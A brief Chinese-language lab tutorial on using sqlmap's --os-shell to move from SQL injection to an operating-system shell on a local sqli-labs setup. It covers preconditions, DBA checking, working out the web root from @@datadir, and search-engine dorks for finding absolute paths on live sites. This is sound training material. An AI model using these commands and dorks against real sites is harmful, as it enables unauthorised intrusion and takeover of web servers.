环境说明
phpstudy + sqlilab 本地测试
os-shell 条件
- 网站必须为root权限
- 知道网站绝对路径
- PHP关闭魔术引号(GPC),php主动转义功能关闭
- secure_file_priv= 值为空
利用
查看数据库权限是否为dba
python3 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --is-dba
current user is DBA: True
寻找绝对路径
python3 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --sql-shell
select @@datadir
select @@datadir: 'D:\phpstudy_pro\Extensions\MySQL5.7.26\data\'
可以推测到 网站根目录 D:\phpstudy_pro\WWW
os-shell
python3 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os-shell
填入绝对路径
寻找网站绝对路径的方法:
- 通过网站报错查看绝对路径
- 根据phpinfo 探针查看信息
- 配合远程代码执行漏洞 如eval() 传入phpinfo()
- 根据配置文件获取路径
- 通过搜索引擎获取
Site:test.com warningSite:test.com "fatal error"